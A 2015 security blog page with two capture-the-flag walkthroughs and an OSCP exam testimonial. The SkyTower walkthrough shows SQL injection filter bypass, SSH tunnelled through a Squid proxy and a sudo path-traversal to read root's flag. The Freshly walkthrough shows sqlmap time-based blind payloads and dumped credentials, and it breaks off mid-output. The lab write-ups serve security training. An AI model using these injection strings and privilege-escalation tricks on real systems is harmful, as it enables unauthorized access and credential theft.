Saturday, May 30, 2015

The Sky Tower Vulnerable VM Walkthrough



I recently took on the challenge to hack the Sky Tower Vulnerable VM. This CTF was designed by Telspace Systems for the CTF at the ITWeb Security Summit and BSidesCPT (Cape Town). The aim is to test intermediate to advanced security enthusiasts in their ability to attack a system using a multi-faceted approach and obtain the "flag".

As usual this VM is hosted by the good folks at vulnhub.com with a ton of other challenges. Here's the approach that I took to gain root level access to the box:

Enumeration

root@kali:~# nmap -A 10.1.1.7

Starting Nmap 6.47 ( http://nmap.org ) at 2015-05-28 20:55 EDT
Nmap scan report for 10.1.1.7
Host is up (0.00084s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
3128/tcp open http-proxy Squid http proxy 3.1.20
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 08:00:27:54:4A:37 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.85 ms 10.1.1.7




The quick glance shows a filtered SSH service, possible website on port 80, and a Squid http proxy. Needing more information, I fired up Nikto and Dirbuster.

root@kali:~# nikto -h 10.1.1.7
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:10.1.1.7
+ Target Hostname: 10.1.1.7
+ Target Port: 80
+ Start Time: 2015-05-28 21:23:39 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ Server leaks inodes via ETags, header found with file /, inode: 87, size: 1136, mtime: Fri Jun 20 07:23:36 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ Retrieved x-powered-by header: PHP/5.4.4-14+deb7u9
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7343 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2015-05-28 21:24:01 (GMT-4) (22 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~# dirb http://10.1.1.7

-----------------
DIRB v2.21
By The Dark Raver
-----------------

START_TIME: Thu May 28 21:25:56 2015
URL_BASE: http://10.1.1.7/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592

---- Scanning URL: http://10.1.1.7/ ----
+ http://10.1.1.7/background (CODE:200|SIZE:2572609)
+ http://10.1.1.7/cgi-bin/ (CODE:403|SIZE:284)
+ http://10.1.1.7/index (CODE:200|SIZE:1136)
+ http://10.1.1.7/index.html (CODE:200|SIZE:1136)
+ http://10.1.1.7/server-status (CODE:403|SIZE:289)
-----------------
DOWNLOADED: 4592 - FOUND: 5


Ok, looking at these results, I see an outdated version of apache running, a login.php page which warrants a closer look, sever pages identified by Dirbuster which are require investigation.

First let's take a look at the login.php page. We find a typical form based page which may be susceptible to Sql Injection:





Using basic single quote techniques and such, I'm able to get the system to generate an overly verbose message revealing the underlying database type:





Curious, and wanting to justify advancing down the Sqli path, I ran Uniscan to verify the injection point:

root@kali:~# uniscan -u http://10.1.1.7/login.php -d
####################################
# Uniscan project #
# http://uniscan.sourceforge.net/ #
####################################
V. 6.2


Scan date: 28-5-2015 22:0:26
=============================================
| Domain: http://10.1.1.7/login.php/
| Server: Apache/2.2.22 (Debian)
| IP: 10.1.1.7
=============================================
|
| Crawler Started:
| Plugin name: FCKeditor upload test v.1 Loaded.
| Plugin name: E-mail Detection v.1.1 Loaded.
| Plugin name: External Host Detect v.1.2 Loaded.
| Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
| Plugin name: Upload Form Detect v.1.1 Loaded.
| Plugin name: Code Disclosure v.1.1 Loaded.
| Plugin name: phpinfo() Disclosure v.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| [+] Crawling finished, 0 URL's found!
|
| FCKeditor File Upload:
|
| E-mails:
|
| External hosts:
|
| Web Backdoors:
|
| File Upload Forms:
|
| Source Code Disclosure:
|
| PHPinfo() Disclosure:
|
| Timthumb:
|
| Ignored Files:
============================================
| Dynamic tests:
| Plugin name: Learning New Directories v.1.2 Loaded.
| Plugin name: FCKedior tests v.1.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| Plugin name: Find Backup Files v.1.2 Loaded.
| Plugin name: Blind SQL-injection tests v.1.3 Loaded.
| Plugin name: Local File Include tests v.1.1 Loaded.
| Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
| Plugin name: Remote Command Execution tests v.1.1 Loaded.
| Plugin name: Remote File Include tests v.1.2 Loaded.
| Plugin name: SQL-injection tests v.1.2 Loaded.
| Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
| Plugin name: Web Shell Finder v.1.3 Loaded.
| [+] 0 New directories added

| FCKeditor tests:

| Timthumb < 1.33 vulnerability:

| Backup Files:

| Blind SQL Injection:

| Local File Include:

| PHP CGI Argument Injection:

| Remote Command Execution:

| Remote File Include:
| |
| SQL Injection:
| [+] Vul [SQL-i] http://10.1.1.7/login.php
| Post data: &email=123'&password=123
| [+] Vul [SQL-i] http://10.1.1.7/login.php
| Post data: &email=123&password=123'

| Cross-Site Scripting (XSS):
|
|
| Web Shell Finder:
====================================

HTML report saved in: report/10.1.1.7.html




I attempted multiple Sql Injection login bypass strings to no avail. Additionally, I fired up the Tamper Data proxy browser plugin to gain a bit more control over the session.



Mildly frustrated, I began a search for common Sql Injection blacklist bypass techniques. I found lots of information, maybe too much; but eventually I stumbled upon a awesome whitepaper on the exploit-db site https://www.exploit-db.com/papers/17934/.



From the whitepaper I extracted this guidance:

Here is a simple bypass using &&, || instead of and, or respectively. Filtered injection: 1 or 1 = 1 1 and 1 = 1 Bypassed injection: 1 || 1 = 1 1 && 1 = 1


I used this new found information to attempt a bypass on the login page. A bit if additional trial and error, mainly around the proper terminating comment character (“--” #) got me past the login page:






Ignoring the filtered status of port 22, I attempted an unsuccessful connection:




Taking the Squid http proxy approach, I decided to attempt to connect using Proxychains. I'd recently performed a similar hack in the Offensive Security OSCP lab, so it wasn't totally foregin to me. I modified /etc/proxychains.conf to connect to the victim machine on port 3189.



Proxychains was able to successfully connect on the machine's ssh port using the obtained credentials:

root@kali:~# proxychains ssh john@10.1.1.7
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
The authenticity of host '10.1.1.7 (10.1.1.7)' can't be established.
ECDSA key fingerprint is f6:3b:95:46:6e:a7:0f:72:1a:67:9e:9b:8a:48:5e:3d.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.1.1.7' (ECDSA) to the list of known hosts.
john@10.1.1.7's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun 20 07:41:08 2014

Funds have been withdrawn
Connection to 10.1.1.7 closed.
root@kali:~#




Upon connection the session closes immediately, however I was able to execute commands over ssh. With this ability I could further system enumeration, attempt to execute a revershell, try to escape the shell that keeps shutdown upon connection, etc....

Issuing an “/bin/sh -i” command, I was able to get a more peristent shell, but it not have “job control”. Afraid that this would restrict something I wanted to do, I opted to modify the .bashrc file in John's home directory:

ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
john@10.1.1.7's password:
total 24
drwx------ 2 john john 4096 Jun 20 2014 .
drwxr-xr-x 5 root root 4096 Jun 20 2014 ..
-rw------- 1 john john 7 Jun 20 2014 .bash_history
-rw-r--r-- 1 john john 220 Jun 20 2014 .bash_logout
-rw-r--r-- 1 john john 3437 Jun 20 2014 .bashrc
-rw-r--r-- 1 john john 675 Jun 20 2014 .profile


I simple renamed the .bashrc file to break its influence on my session.

root@kali:~# proxychains ssh john@10.1.1.7 "mv .bashrc bashrc.bak"
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
john@10.1.1.7's password:


Finally got a solid shell:

ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
john@10.1.1.7's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu May 28 23:52:47 2015 from 10.1.1.7
john@SkyTower:~$


Poking around on the system I took a look in the login.php file and found hardcoded mysql db credentials:



I also found the pesky culprit behind our Sql Injection auth bypass issues:

$sqlinjection = array("SELECT", "TRUE", "FALSE", "--","OR", "=", ",", "AND", "NOT");
$email = str_ireplace($sqlinjection, "", $_POST['email']);
$password = str_ireplace($sqlinjection, "", $_POST['password']);

$sql= "SELECT * FROM login where email='".$email."' and password='".$password."';";
$result = $db->query($sql);


Using the db credentials, I was able to login to the db and extract additionaldb credentials:

john@SkyTower:/var/www$ mysql --user=root --password=root SkyTech
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 2288
Server version: 5.5.35-0+wheezy1 (Debian)

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>


-----------------------------------------------------------------------------------------------------------------------------------------------

mysql> use SkyTech;
Database changed

mysql> select * from login;
+----+---------------------+--------------+
| id | email | password |
+----+---------------------+--------------+
| 1 | john@skytech.com | hereisjohn |
| 2 | sara@skytech.com | ihatethisjob |
| 3 | william@skytech.com | senseable |
+----+---------------------+--------------+
3 rows in set (0.00 sec)

mysql>

Giving the db username and passwords a try for system login worked out for me. I was able to login as sara who had limited sudo access to list and cat a couple of root directories. I in turn used this access to include the listing of the root home directory and using cat to open the flag.txt file.

sara@SkyTower:~$ sudo ls /accounts/../root/
flag.txt
sara@SkyTower:~$ sudo cat /accounts/../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower


sara@SkyTower:~$ su root
Password:
root@SkyTower:~#


We'll that's all for this one. I really enjoyed this challenge. I'll keep my eyes open for more from the folks at TeleSpace Systems.


Court Graham, signing off....

Wednesday, May 27, 2015

Offensive Security PWK Course and Exam Testimonial




I recently completed the Penetration Testing with Kali Linux course and successfully passed the Offensive Security Certified Professional Exam. However, the path to success was not without its hurdles. I'm writing this course/exam review to paint a picture of what to expect, as well as shine some light on the mental preparation necessary.

If you are reading this review, I'm just about certain that you know the all about the registration process, course syllabus, video and printed material format, hands on lab environment and examination process. If not please refer to the Offensive Security training and certification websites.


As many of prospective students of the course, I have a full basket of life responsibilities including but not limited to a full time job as an information security professional, a husband, father of 3 boys, a 1 hour commute to and from the office, and an infinite honey do list. With those responsibilities alone you may be wonder when I would have time to time to take on this sort of certification challenge. The short answer is you'll need to cut into you normal sleep hours.

I've broken down my training, lab and exam rants into a list of numbered per-conceptions, mis-conceptions, and suggestions:

Course & Exercises

  1. The PWK Course Covers all topics necessary for the exam – I believe this statement to be true, but however make sure to study the theories and research the topics on your own. Use both the exercises and lab time to make the practical application of each topic second nature.
  2. You have to complete and submit all of the completed exercises in order to register for the exam – This is not true. The Offensive Security Staff will definitely not impose such restrictions on the student. You'll soon find out how much the responsibility is on you to make sure you are ready. Don't take this as an opportunity to not complete the exercises, they're there for a reason.
  3. You can study by reviewing videos and the documentation and do not require lab time – This is partially true. I'll explain; Depending the time that you can invest (Daily/Nightly) the initial lab time may only be lightly utilized. Without giving too much away, the early portion of the training is centered around enumeration, both WAN, LAN, and system; this is for good reason. With that said you'll be able to sharpen these skills in the lab, but this will not require the amount of time that you'll have to invest later in the course. If you find that you initial lab time is running short don't panic, continue to take the necessary time to study the contents in from the videos and printed material.
    Don't hesitate to purchase more lab time if necessary!
    The Lab Environment

The PWK Lab Environment consist of approximately 50 machines which span 3 different networks. This is a true playground for the security enthusiast. The degree of difficulty varies from one machine to the next.

  1. You do not have to compromise all 50 machines – As mentioned in my previous point, it is your responsibility to best prepare your self for the OSCP exam. These machines are priceless in the pursuit of preparation, but its easy to loose focus and forget about the primary goal, the OSCP certification. You can always purchase lab time with the intent on owning all of the machines if that's your desire.
  2. Regulate the amount of lab assistance you receive – If utilized, the lab and the associated freenode #offsec irc channel, serve as a great resource to communicate with your peers and the Offensive Security administrators. The Offsec admins are wise and will not give you too much information. The prize is truly in the pursuit, they're aware of this and will not hesitate to tell you to “Try Harder”.
    Resist the temptation to turn to your peers for too much guidance; it will hurt you in the long run!
  3. Take detailed notes during your lab conquest – This detailed note taking process will come in handy, as during the exam you will doubtingly wonder “How did I perform that one exploit, what was the syntax of that one command?” Your notes will save you time and serve as a great study resource even when you are not online. Keepnote which is available on your Kali Linux image is in my opinion the best tool for note keeping.

The Exam


I have taken countless IT and Security Certifications throughout my career, I have never failed in any attempt; until now......

I don't say this to scare or discourage anyone. First off, there is no such thing as failure; just continued opportunities for learning. Corny but true..

Actually, the third time was a Charm. I know how did that happen, let me tell you how so you can avoid the same mistakes, believe me its possible!


As you all know, you have approximately 24 hours to complete the required exam objectives which are communicated to you the day of the exam via email. You'll have a certain number of machines with associated scored objectives. Achieving these objectives while documenting your process and proof will give you a passing score. Once achieved you must submit the penetration test report to Offsec for evaluation (Pass/Fail).

Ok, now here some do's and dont's:

  • Do not allow your eyes to deceive you – You have just completed countless hours of theory and practical application of the required techniques necessary to pass the exam, better yet own the box at hand! “Avoid losing focus of the trees for the forest...” Don't worry about passing the exam until you're done with the last box. The thought and desire to pass can be distracting.
    If you see a certain vulnerability, trust in your training, if its looks like chicken, tastes like chicken, its probably chicken!


    This was culprit during my first attempt, don't over think during the challenge you know how to do this stuff. Don't let the subtle differences between the lab and exam throw you for a loop, use what you've been trained.

  • Prepare exploits and a list of go-to commands prior to the test – Yes, you'll have you course materials at your disposal during the exam, but you will not want to flip through pages or take the time to watch videos during the exam. Trust me its the shortest 24hours of your life. I created a spreadsheet which I'll refine and post for download, that I call my Warchess. It contains the step by step stack-based buffer overflow exploitation process as Taught in the Offsec training; I was able to use this to make sure I hadn't missed any necessary steps, Common commands, Shell escape sequences, Netcat, Python, Perl, bind and reverse shell syntax, and a list of my per-compiled Linux and Windows remote and local exploits.
  • Get plenty of rest – This was partially the culprit during my second attempt. My anticipation for the exam would not allow me to sleep well the night before. I got 3 hours of sleep in total. Ultimately I knew how to achieve success, but did not have the energy and mental fortitude.
  • Download and Practice vulnerable applications to exploit – The exploit-db has several exploits publicized Remote Buffer Overflow exploits which have down loadable links to the vulnerable applications for your own P.O.Cs. Do this, master these exploits and all the curveballs prior to potentially seeing them during the exam.


  • Take frequent breaks – I know this is on allot of posts, however, do not ignore this. Sitting in one place and concentrating on the exam can be extremely stressful on the body. Make sure you stretch and keep the blood circulating. Also, you mind will benefit from switching gears.
    So in summary, I made a couple fatal mistakes.
  • Not following through with known exploits from the training
  • Not getting enough sleep the night before the examination
  • Not adequately preparing for the unknown
    Ultimately, after overcoming my issues, I was able to complete the exam in about 8 hours. I used a bit of the remaining time to put finishing touches on my lab/exam report. The good folks at Offensive Security sent me a Congratulations email on the same day; awarding me with the elusive OSCP certification; by far the best certification accomplishment thus far.

I will continue to hone my craft in preparation for Cracking the Perimeter/OSCE later this year

Freshly Vulnerable VM Walkthrough


Today I will be explaining how I was able to complete the Top-Hat-Sec Freshly Challenge. The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. I took it just a tiny bit further and gained a root shell. Here's what I did:

Enumeration


After spinning up the VM in VirtualBox, I located its DHCP Address on my local nat network, and had at it:

root@kali:~# nmap -A 10.1.1.11

Starting Nmap 6.47 ( http://nmap.org ) at 2015-05-22 21:09 EDT
Nmap scan report for 10.1.1.11
Host is up (0.00052s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
443/tcp  open  ssl/http Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-02-17T03:30:05+00:00
|_Not valid after:  2025-02-14T03:30:05+00:00
|_ssl-date: 1901-12-13T20:45:52+00:00; -113y160d4h24m13s from local time.
8080/tcp open  http     Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:F2:73:82 (Cadmus Computer Systems)

Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms 10.1.1.11

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.27 seconds
root@kali:~#

______________________________________________________________________________


A quick viewing of some of the hosted webpages brought this challenge close to my geek heart:


Paying heed to the Jedi Mind Trick, I pushed forward 

Continuing with my normal enumeration process, I used nikto to possibly identify any low hanging fruit or directories. 

This was overlooked -- Nikto scan on port 80 found login.php


root@kali:~# nikto -h 10.1.1.11
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.1.1.11
+ Target Hostname:    10.1.1.11
+ Target Port:        80
+ Start Time:         2015-05-22 23:47:57 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x2f 0x50f4228b8016c
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5
+ Uncommon header 'x-webkit-csp' found, with contents: default-src 'self' ;script-src 'self'  'unsafe-inline' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data:  *.tile.openstreetmap.org *.tile.opencyclemap.org;
+ Uncommon header 'x-ob_mode' found, with contents: 0
+ Uncommon header 'x-content-security-policy' found, with contents: default-src 'self' ;options inline-script eval-script;img-src 'self' data:  *.tile.openstreetmap.org *.tile.opencyclemap.org;
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6732 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2015-05-22 23:48:12 (GMT-4) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~# 

______________________________________________________________________________

Needing more information, I turned to Dirbuster to reveal the site's structure or any hidden pages. I quickly found a wordpress site hosted both on port 443 & 8080. 


Ok, at this point I was starting  to get happy, due to the rich amount of Wordpress vulnerabilities out there. I turned to wpscan trying to enumerate the admin user and find any vulns:

root@kali:~# wpscan --url 10.1.1.11:8080/wordpress/ --enumerate u
_______________________________________________________________
        __          _______   _____                
        \ \        / /  __ \ / ____|                
         \ \  /\  / /| |__) | (___   ___  __ _ _ __
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.6
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://10.1.1.11:8080/wordpress/
[+] Started: Fri May 22 21:41:21 2015

[!] The WordPress 'http://10.1.1.11:8080/wordpress/readme.html' file exists exposing a version number
[!] Full Path Disclosure (FPD) in: 'http://10.1.1.11:8080/wordpress/wp-includes/rss-functions.php'
[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] XML-RPC Interface available under: http://10.1.1.11:8080/wordpress/xmlrpc.php

[+] WordPress version 4.1 identified from meta generator

[+] Enumerating plugins from passive detection ...
 | 4 plugins found:

[+] Name: cart66-lite - v1.5.3
 |  Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/cart66-lite/
 |  Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/cart66-lite/readme.txt

[!] Title: Cart66 Lite <= 1.5.3 - SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/7737
    Reference: https://research.g0blin.co.uk/g0blin-00022/
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9442
[i] Fixed in: 1.5.4

[+] Name: contact-form-7 - v4.1
 |  Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/contact-form-7/
 |  Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/contact-form-7/readme.txt

[+] Name: proplayer - v4.7.9.1
 |  Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/proplayer/
 |  Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/proplayer/readme.txt

[!] Title: ProPlayer 4.7.9.1 - SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/6912
    Reference: http://osvdb.org/93564
    Reference: http://www.exploit-db.com/exploits/25605/

[+] Name: all-in-one-seo-pack - v2.2.5.1
 |  Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/all-in-one-seo-pack/
 |  Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/all-in-one-seo-pack/readme.txt

[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
    +----+-------+-------+
    | Id | Login | Name  |
    +----+-------+-------+
    | 1  | admin | admin |
    +----+-------+-------+
[!] Default first WordPress username 'admin' is still used

[+] Finished: Fri May 22 21:41:28 2015
[+] Memory used: 3.234 MB
[+] Elapsed time: 00:00:06
root@kali:~#
_____________________________________________________________________________


Ok, there are a couple of SQL injection one for the Cart66 Lite Plugin. This one requires credentials which I don't have yet..

The ProPlayer Injection plain didn't work for me...

I also tried to brute force the admin user's password, unsuccessfully. I must have overlooked something. Going back through my notes I found the login.php page in my nikto output:

Browsing to it I found a simple login page which had SQL injection written all over it:


I started a handful of the command injection strings, the author of the VM helped us out a bit by coding a 1 or 0 visible on the page.


A series of single quotes revealed that there was an underlying Mysql database on the server. Sounds like a job for sqlmap:


root@kali:~# sqlmap  -u "10.1.1.11/login.php" --data="user=1&password=1&s=Submit" --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150527}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:53:02

[23:53:02] [INFO] resuming back-end DBMS 'mysql'
[23:53:02] [INFO] testing connection to the target URL
[23:53:02] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: user (POST)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: user=1' AND (SELECT * FROM (SELECT(SLEEP(5)))pxgC) AND 'YfWH'='YfWH&password=1&s=Submit
---
[23:53:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.11
[23:53:03] [INFO] fetching database names
[23:53:03] [INFO] fetching number of databases
[23:53:03] [WARNING] time-based comparison requires larger statistical model, please wait..............................                    
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[23:53:14] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
7
[23:53:19] [INFO] retrieved:
[23:53:24] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[23:54:35] [INFO] retrieved: login
[23:54:58] [INFO] retrieved: mysql
[23:55:18] [INFO] retrieved: performance_schema
[23:56:29] [INFO] retrieved: phpmyadmin
[23:57:13] [INFO] retrieved: users
[23:57:32] [INFO] retrieved: wordpress8080
available databases [7]:
[*] information_schema
[*] login
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] users
[*] wordpress8080


[23:58:32] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.11'

[*] shutting down at 23:58:32

root@kali:~#


_______________________________________________________________________________


Poking around in each DB with sqlmap I ultimately found the wordpress admin account:

root@kali:~# sqlmap  -u "10.1.1.11/login.php" --data="user=1&password=1&s=Submit" -D wordpress8080 --dump
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150527}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:46:07

[23:46:07] [WARNING] using '/root/.sqlmap/output' as the output directory
[23:46:07] [INFO] testing connection to the target URL
[23:46:07] [INFO] heuristics detected web page charset 'ascii'
[23:46:07] [INFO] testing if the target URL is stable. This can take a couple of seconds
[23:46:08] [INFO] target URL is stable
[23:46:08] [INFO] testing if POST parameter 'user' is dynamic
[23:46:08] [WARNING] POST parameter 'user' does not appear dynamic
[23:46:08] [WARNING] heuristic (basic) test shows that POST parameter 'user' might not be injectable
[23:46:08] [INFO] testing for SQL injection on POST parameter 'user'
[23:46:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:46:09] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[23:46:09] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:46:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[23:46:09] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[23:46:09] [INFO] testing 'MySQL inline queries'
[23:46:09] [INFO] testing 'PostgreSQL inline queries'
[23:46:09] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[23:46:09] [INFO] testing 'Oracle inline queries'
[23:46:09] [INFO] testing 'SQLite inline queries'
[23:46:09] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:46:09] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:46:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:46:09] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)'
[23:46:19] [INFO] POST parameter 'user' seems to be 'MySQL > 5.0.11 AND time-based blind (SELECT)' injectable
[23:46:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[23:46:19] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:46:20] [INFO] target URL appears to be UNION injectable with 2 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[23:46:23] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[23:46:23] [INFO] testing 'Generic UNION query (88) - 1 to 20 columns'
[23:46:23] [INFO] checking if the injection point on POST parameter 'user' is a false positive
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 133 HTTP(s) requests:
---
Parameter: user (POST)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: user=1' AND (SELECT * FROM (SELECT(SLEEP(5)))pxgC) AND 'YfWH'='YfWH&password=1&s=Submit
---
[23:46:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.11
[23:46:45] [INFO] fetching tables for database: 'wordpress8080'
[23:46:45] [INFO] fetching number of tables for database 'wordpress8080'
[23:46:45] [INFO] retrieved:
[23:46:45] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
1
[23:46:54] [INFO] retrieved:
[23:47:04] [INFO] adjusting time delay to 1 second due to good response times
users
[23:47:21] [INFO] fetching columns for table 'users' in database 'wordpress8080'
[23:47:21] [INFO] retrieved: 2
[23:47:23] [INFO] retrieved: username
[23:47:53] [INFO] retrieved: password
[23:48:28] [INFO] fetching entries for table 'users' in database 'wordpress8080'
[23:48:28] [INFO] fetching number of entries for table 'users' in database 'wordpress8080'
[23:48:28] [INFO] retrieved: 1
[23:48:29] [INFO] retrieved: SuperSecretPassword
[23:49:44] [INFO] retrieved: admin
[23:50:03] [INFO] analyzing table dump for possible password hashes
Database: wordpress8080
Table: users
[1 entry]
+----------+---------------------+
| username | password            |
+----------+---------------------+
| admin    | SuperSecretPassword |
+----------+---------------------+


[23:50:03] [INFO] table 'wordpress8080.users' dumped to CSV file '/root/.sqlmap/output/10.1.1.11/dump/wordpress8080/users.csv'
